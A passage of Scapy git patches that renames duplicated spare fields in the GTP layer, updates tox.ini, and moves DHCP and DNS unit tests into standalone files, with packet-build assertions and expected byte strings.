mtime_s=0xffffffff, + mtime_ns=0x11111111, ctime_s=0x22222222, ctime_ns=0x33333333), + verifier=0xa, value_follows=1, + files=[File_From_Dir_Plus(fileid=0xa, + filename=Object_Name(length=5, _name='file1', fill='\x00\x00\x00'), + cookie=0xb, attributes_follow=1, + attributes=Fattr3(type='NF3REG', mode=0o755, nlink=1, uid=2, gid=3, + size=0xffffffffffffffff, used=0xaaaaaaaaaaaaaaaa, + rdev=[4, 5], fsid=0xbbbbbbbbbbbbbbbb, + fileid=0xcccccccccccccccc, atime_s=0xdddddddd, + atime_ns=0xeeeeeeee, mtime_s=0xffffffff, + mtime_ns=0x11111111, ctime_s=0x22222222, + ctime_ns=0x33333333), + handle_follows=1, filehandle=File_Object(length=3, fh='fh1', fill='\x00'), + value_follows=1), + File_From_Dir_Plus(fileid=0xb, filename=Object_Name(length=5, _name='file2', fill='\x00\x00\x00'), + cookie=0xc, attributes_follow=1, attributes=Fattr3(type='NF3REG', mode=0o755, nlink=1, uid=2, + gid=3, size=0xffffffffffffffff, used=0xaaaaaaaaaaaaaaaa, rdev=[4, 5], fsid=0xbbbbbbbbbbbbbbbb, + fileid=0xcccccccccccccccc, atime_s=0xdddddddd, atime_ns=0xeeeeeeee, mtime_s=0xffffffff, + mtime_ns=0x11111111, ctime_s=0x22222222, ctime_ns=0x33333333), handle_follows=1, + filehandle=File_Object(length=3, fh='fh2', fill='\x00'), value_follows=0) + ], eof=1) assert bytes(pkt) == b'\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x01\xed\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x04\x00\x00\x00\x05\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xee\xee\xee\xee\xff\xff\xff\xff\x11\x11\x11\x11""""3333\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x05file1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x01\xed\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x04\x00\x00\x00\x05\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xee\xee\xee\xee\xff\xff\xff\xff\x11\x11\x11\x11""""3333\x00\x00\x00\x01\x00\x00\x00\x03fh1\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x05file2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x01\xed\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x04\x00\x00\x00\x05\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xee\xee\xee\xee\xff\xff\xff\xff\x11\x11\x11\x11""""3333\x00\x00\x00\x01\x00\x00\x00\x03fh2\x00\x00\x00\x00\x00\x00\x00\x00\x01' pkt = WRITE_Reply( diff --git a/test/contrib/portmap.uts b/test/contrib/portmap.uts index dd8a26a2abc..4e58c1ecb1e 100644 --- a/test/contrib/portmap.uts +++ b/test/contrib/portmap.uts @@ -51,24 +51,9 @@ pkt = GETPORT_Reply( ) assert bytes(pkt) == b'\x00\x00\x08\x01' -pkt = DUMP_Reply( - value_follows=1, - mappings=[ - Map_Entry( - prog=1, - vers=2, - prot=3, - port=4, - value_follows=1 - ), - - Map_Entry( - prog=5, - vers=6, - prot=7, - port=8, - value_follows=0 - ) - ] -) +pkt = DUMP_Reply(value_follows=1, + mappings=[Map_Entry(prog=1, vers=2, prot=3, port=4, value_follows=1), + Map_Entry(prog=5, vers=6, prot=7, port=8, value_follows=0), + ] + ) assert bytes(pkt) == b'\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x00' diff --git a/tox.ini b/tox.ini index bfe61087b9b..2442c436211 100644 --- a/tox.ini +++ b/tox.ini @@ -1,10 +1,10 @@ # Scapy tox configuration file -# Copyright (C) 2019 Guillaume Valadon +# Copyright (C) 2020 Guillaume Valadon [tox] -envlist = py{27,34,35,36,37,38,py,py3}-{linux,bsd}_{non_root,root}, - py{27,34,25,36,37,38,py,py3}-windows, +envlist = py{27,34,35,36,37,38,39,py,py3}-{linux,bsd}_{non_root,root}, + py{27,34,25,36,37,38,39,py,py3}-windows, skip_missing_interpreters = true minversion = 2.9 From 65c34466f30769ea26c089ef0d13d9b3d00e0a01 Mon Sep 17 00:00:00 2001 From: Geoff Newson Date: Wed, 14 Oct 2020 11:50:15 +0100 Subject: [PATCH 0316/1632] Remove duplicated fields from GTP --- scapy/contrib/gtp.py | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 07d36e3a518..ac211176cb0 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -574,13 +574,13 @@ class QoS_Profile(IE_Base): name = "QoS profile" fields_desc = [ByteField("qos_ei", 0), ByteField("length", None), - XBitField("spare", 0x00, 2), + XBitField("qos_spare1", 0x00, 2), XBitField("delay_class", 0x000, 3), XBitField("reliability_class", 0x000, 3), XBitField("peak_troughput", 0x0000, 4), BitField("spare", 0, 1), XBitField("precedence_class", 0x000, 3), - XBitField("spare", 0x000, 3), + XBitField("qos_spare2", 0x000, 3), XBitField("mean_troughput", 0x00000, 5), XBitField("traffic_class", 0x000, 3), XBitField("delivery_order", 0x00, 2), @@ -602,7 +602,7 @@ class IE_QoS(IE_Base): ShortField("length", None), ByteField("allocation_retention_prioiry", 1), - ConditionalField(XBitField("spare", 0x00, 2), + ConditionalField(XBitField("ie_qos_spare1", 0x00, 2), lambda p: p.length and p.length > 1), ConditionalField(XBitField("delay_class", 0x000, 3), lambda p: p.length and p.length > 1), @@ -611,12 +611,12 @@ class IE_QoS(IE_Base): ConditionalField(XBitField("peak_troughput", 0x0000, 4), lambda p: p.length and p.length > 2), - ConditionalField(BitField("spare", 0, 1), + ConditionalField(BitField("ie_qos_spare2", 0, 1), lambda p: p.length and p.length > 2), ConditionalField(XBitField("precedence_class", 0x000, 3), lambda p: p.length and p.length > 2), - ConditionalField(XBitField("spare", 0x000, 3), + ConditionalField(XBitField("ie_qos_spare3", 0x000, 3), lambda p: p.length and p.length > 3), ConditionalField(XBitField("mean_troughput", 0x00000, 5), lambda p: p.length and p.length > 3), @@ -727,12 +727,12 @@ class IE_MSTimeZone(IE_Base): fields_desc = [ByteEnumField("ietype", 153, IEType), ShortField("length", None), ByteField("timezone", 0), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), + BitField("ie_mstz_spare1", 0, 1), + BitField("ie_mstz_spare2", 0, 1), + BitField("ie_mstz_spare3", 0, 1), + BitField("ie_mstz_spare4", 0, 1), + BitField("ie_mstz_spare5", 0, 1), + BitField("ie_mstz_spare6", 0, 1), XBitField("daylight_saving_time", 0x00, 2)] @@ -754,11 +754,11 @@ class IE_DirectTunnelFlags(IE_Base): name = "Direct Tunnel Flags" fields_desc = [ByteEnumField("ietype", 182, IEType), ShortField("length", 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), - BitField("Spare", 0, 1), + BitField("ie_dtf_spare1", 0, 1), + BitField("ie_dtf_spare2", 0, 1), + BitField("ie_dtf_spare3", 0, 1), + BitField("ie_dtf_spare4", 0, 1), + BitField("ie_dtf_spare5", 0, 1), BitField("EI", 0, 1), BitField("GCSI", 0, 1), BitField("DTI", 0, 1)] @@ -775,10 +775,10 @@ class IE_EvolvedAllocationRetentionPriority(IE_Base): name = "Evolved Allocation/Retention Priority" fields_desc = [ByteEnumField("ietype", 191, IEType), ShortField("length", 1), - BitField("Spare", 0, 1), + BitField("ie_earp_spare1", 0, 1), BitField("PCI", 0, 1), XBitField("PL", 0x0000, 4), - BitField("Spare", 0, 1), + BitField("ie_earp_spare2", 0, 1), BitField("PVI", 0, 1)] From f8d1d30b79abb853d27f8d62a44243e4a398ea3e Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 14 Oct 2020 09:54:44 +0200 Subject: [PATCH 0317/1632] Standalone DHCP unit tests Co-authored-by: Gabriel Co-authored-by: Wlodek Wencel Co-authored-by: Artur Zdolinski --- test/regression.uts | 70 ------------------------------------- test/scapy/layers/dhcp.uts | 71 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 71 insertions(+), 70 deletions(-) create mode 100644 test/scapy/layers/dhcp.uts diff --git a/test/regression.uts b/test/regression.uts index ee51c6af717..dfab3761263 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -10812,76 +10812,6 @@ assert(p.params == []) param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() assert(param1.random != param2.random) -############ -############ -+ DHCP - -= BOOTP - misc -assert BOOTP().answers(BOOTP()) -assert BOOTP().hashret() == b"\x00\x00\x00\x00" - -import random -random.seed(0x2809) -assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_ttl', 229)]"] - -= DHCPOptionsField - -value = [("hostname", "scapy")] -dhcpoptfield = DHCPOptionsField("options", "") -assert dhcpoptfield.i2repr("", value) == "[hostname='scapy']" -assert dhcpoptfield.i2repr("", ["opt", "opt2"]) == "[opt opt2]" -assert dhcpoptfield.i2m("", value) == b'\x0c\x05scapy' -assert dhcpoptfield.m2i("", b'\x0cunknown') == [b'\x0cunknown'] -assert dhcpoptfield.m2i("", b'\x0c\x05scapy') == [('hostname', b'scapy')] - -unknown_value_end = b"\xfe" + b"\xff"*257 -udof = DHCPOptionsField("options", unknown_value_end) -assert udof.m2i("", unknown_value_end) == [(254, b'\xff'*255), 'end'] - -unknown_value_pad = b"\xfe" + b"\xff"*256 + b"\x00" -udof = DHCPOptionsField("options", unknown_value_pad) -assert udof.m2i("", unknown_value_pad) == [(254, b'\xff'*255), 'pad'] - -= DHCP - build - -s = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("message-type","discover"),"end"])) -assert s == b'E\x00\x01\x10\x00\x01\x00\x00@\x11{\xda\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x00\xfcf\xea\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc5\x01\x01\xff' - -s2 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("param_req_list",[12,57,45,254]),("requested_addr", "192.168.0.1"),"end"])) -assert s2 == b'E\x00\x01\x19\x00\x01\x00\x00@\x11{\xd1\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x058\xeb\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc7\x04\x0c9-\xfe2\x04\xc0\xa8\x00\x01\xff' - -s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("time_zone",123),("uap-servers","www.example.com"),("netinfo-server-address","10.0.0.1"), - ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) -assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' - -= DHCP - dissection - -p = IP(s) -assert DHCP in p and p[DHCP].options[0] == ('message-type', 1) - -p2 = IP(s2) -assert DHCP in p2 -assert p2[DHCP].options[0] == ("param_req_list",[12,57,45,254]) -assert p2[DHCP].options[1] == ("requested_addr", "192.168.0.1") - -p3 = IP(s3) -assert DHCP in p3 -assert p3[DHCP].options[0] == ("time_zone",123) -assert p3[DHCP].options[1] == ("uap-servers", b'www.example.com') -assert p3[DHCP].options[2] == ("netinfo-server-address", "10.0.0.1") -assert p3[DHCP].options[3] == ("ieee802-3-encapsulation", 2) -assert p3[DHCP].options[4] == ("max_dgram_reass_size", 120) -assert p3[DHCP].options[5] == ("pxelinux_path_prefix", b'/some/path') -assert p3[DHCP].options[6] == "end" - -= DHCPOptions - -# Issue #2786 - -assert DHCPOptions[33].name == "static-routes" -assert DHCPOptions[46].name == "NetBIOS_node_type" -assert DHCPRevOptions['static-routes'][0] == 33 - ############ ############ + 802.11 diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts new file mode 100644 index 00000000000..f7cafd75ccc --- /dev/null +++ b/test/scapy/layers/dhcp.uts @@ -0,0 +1,71 @@ +% DHCP regression tests for Scapy + +############ +############ ++ DHCP + += BOOTP - misc +assert BOOTP().answers(BOOTP()) +assert BOOTP().hashret() == b"\x00\x00\x00\x00" + +import random +random.seed(0x2809) +assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_ttl', 229)]"] + += DHCPOptionsField + +value = [("hostname", "scapy")] +dhcpoptfield = DHCPOptionsField("options", "") +assert dhcpoptfield.i2repr("", value) == "[hostname='scapy']" +assert dhcpoptfield.i2repr("", ["opt", "opt2"]) == "[opt opt2]" +assert dhcpoptfield.i2m("", value) == b'\x0c\x05scapy' +assert dhcpoptfield.m2i("", b'\x0cunknown') == [b'\x0cunknown'] +assert dhcpoptfield.m2i("", b'\x0c\x05scapy') == [('hostname', b'scapy')] + +unknown_value_end = b"\xfe" + b"\xff"*257 +udof = DHCPOptionsField("options", unknown_value_end) +assert udof.m2i("", unknown_value_end) == [(254, b'\xff'*255), 'end'] + +unknown_value_pad = b"\xfe" + b"\xff"*256 + b"\x00" +udof = DHCPOptionsField("options", unknown_value_pad) +assert udof.m2i("", unknown_value_pad) == [(254, b'\xff'*255), 'pad'] + += DHCP - build + +s = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("message-type","discover"),"end"])) +assert s == b'E\x00\x01\x10\x00\x01\x00\x00@\x11{\xda\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x00\xfcf\xea\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc5\x01\x01\xff' + +s2 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("param_req_list",[12,57,45,254]),("requested_addr", "192.168.0.1"),"end"])) +assert s2 == b'E\x00\x01\x19\x00\x01\x00\x00@\x11{\xd1\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x058\xeb\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc7\x04\x0c9-\xfe2\x04\xc0\xa8\x00\x01\xff' + +s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("time_zone",123),("uap-servers","www.example.com"),("netinfo-server-address","10.0.0.1"), + ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) +assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' + += DHCP - dissection + +p = IP(s) +assert DHCP in p and p[DHCP].options[0] == ('message-type', 1) + +p2 = IP(s2) +assert DHCP in p2 +assert p2[DHCP].options[0] == ("param_req_list",[12,57,45,254]) +assert p2[DHCP].options[1] == ("requested_addr", "192.168.0.1") + +p3 = IP(s3) +assert DHCP in p3 +assert p3[DHCP].options[0] == ("time_zone",123) +assert p3[DHCP].options[1] == ("uap-servers", b'www.example.com') +assert p3[DHCP].options[2] == ("netinfo-server-address", "10.0.0.1") +assert p3[DHCP].options[3] == ("ieee802-3-encapsulation", 2) +assert p3[DHCP].options[4] == ("max_dgram_reass_size", 120) +assert p3[DHCP].options[5] == ("pxelinux_path_prefix", b'/some/path') +assert p3[DHCP].options[6] == "end" + += DHCPOptions + +# Issue #2786 + +assert DHCPOptions[33].name == "static-routes" +assert DHCPOptions[46].name == "NetBIOS_node_type" +assert DHCPRevOptions['static-routes'][0] == 33 From 71bfe985a146d7188ca33de670b3390ce50aaebf Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 14 Oct 2020 10:26:08 +0200 Subject: [PATCH 0318/1632] Standalone DNS unit tests Co-authored-by: Phil Co-authored-by: Gabiel Co-authored-by: Pierre Lalet Co-authored-by: Louis Granboulan --- test/regression.uts | 181 ------------------------------------- test/scapy/layers/dns.uts | 182 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 182 insertions(+), 181 deletions(-) create mode 100644 test/scapy/layers/dns.uts diff --git a/test/regression.uts b/test/regression.uts index dfab3761263..b03ee141799 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1682,20 +1682,6 @@ def _test(): retry_test(_test) -= DNS request -~ netaccess IP UDP DNS -* A possible cause of failure could be that the open DNS (resolver1.opendns.com) -* is not reachable or down. -def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - dns_ans = sr1(IP(dst="resolver1.opendns.com")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.slashdot.com")),timeout=5) - conf.debug_dissector = old_debug_dissector - DNS in dns_ans - return dns_ans - -dns_ans = retry_test(_test) - = Whois request ~ netaccess IP * This test retries on failure because it often fails @@ -1880,24 +1866,6 @@ s,r=ans[0] s.show() s.show(2) -= DNS packet manipulation -~ netaccess IP UDP DNS -dns_ans.show() -dns_ans.show2() -dns_ans[DNS].an.show() -dns_ans2 = IP(raw(dns_ans)) -DNS in dns_ans2 -assert(raw(dns_ans2) == raw(dns_ans)) -dns_ans2.qd.qname = "www.secdev.org." -* We need to recalculate these values -del(dns_ans2[IP].len) -del(dns_ans2[IP].chksum) -del(dns_ans2[UDP].len) -del(dns_ans2[UDP].chksum) -assert(b"\x03www\x06secdev\x03org\x00" in raw(dns_ans2)) -assert(DNS in IP(raw(dns_ans2))) -assert raw(DNSRR(type='A', rdata='1.2.3.4')) == b'\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x04\x01\x02\x03\x04' - = Arping ~ netaccess tcpdump * This test assumes the local network is a /24. This is bad. @@ -6901,155 +6869,6 @@ pkt2.len = 0 pkt3 = IP(raw(pkt2)) assert pkt3.load == data -= DNS -~ dns - -* DNS over UDP -pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(qd=DNSQR(qname="secdev.org.")))) -assert UDP in pkt and isinstance(pkt[UDP].payload, DNS) -assert pkt[UDP].dport == 53 and pkt[UDP].length is None -assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." - -* DNS over TCP -pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="P")/DNS(qd=DNSQR(qname="secdev.org.")))) -assert TCP in pkt and isinstance(pkt[TCP].payload, DNS) -assert pkt[TCP].dport == 53 and pkt[DNS].length is not None -assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." - -= DNS frame with advanced decompression -~ dns - -a = b'\x01\x00^\x00\x00\xfb$\xa2\xe1\x90\xa9]\x08\x00E\x00\x01P\\\xdd\x00\x00\xff\x11\xbb\x93\xc0\xa8\x00\x88\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01<*\x81\x00\x00\x84\x00\x00\x00\x00\x03\x00\x00\x00\x04\x01B\x019\x015\x019\x013\x014\x017\x013\x016\x017\x010\x012\x010\x01D\x018\x011\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x0f\x07Zalmoid\x05local\x00\x011\x01A\x019\x014\x017\x01E\x01A\x014\x01B\x01A\x01F\x01B\x012\x011\x014\x010\x010\x016\x01E\x01F\x017\x011\x01F\x012\x015\x013\x01E\x010\x011\x010\x01A\x012\xc0L\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\x03136\x010\x03168\x03192\x07in-addr\xc0P\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0o\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0o\x00\x02\x00\x08\xc0\xbd\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\xbd\x00\x02\x00\x08\x00\x00)\x05\xa0\x00\x00\x11\x94\x00\x12\x00\x04\x00\x0e\x00\xc1&\xa2\xe1\x90\xa9]$\xa2\xe1\x90\xa9]' -pkt = Ether(a) -assert pkt.ancount == 3 -assert pkt.arcount == 4 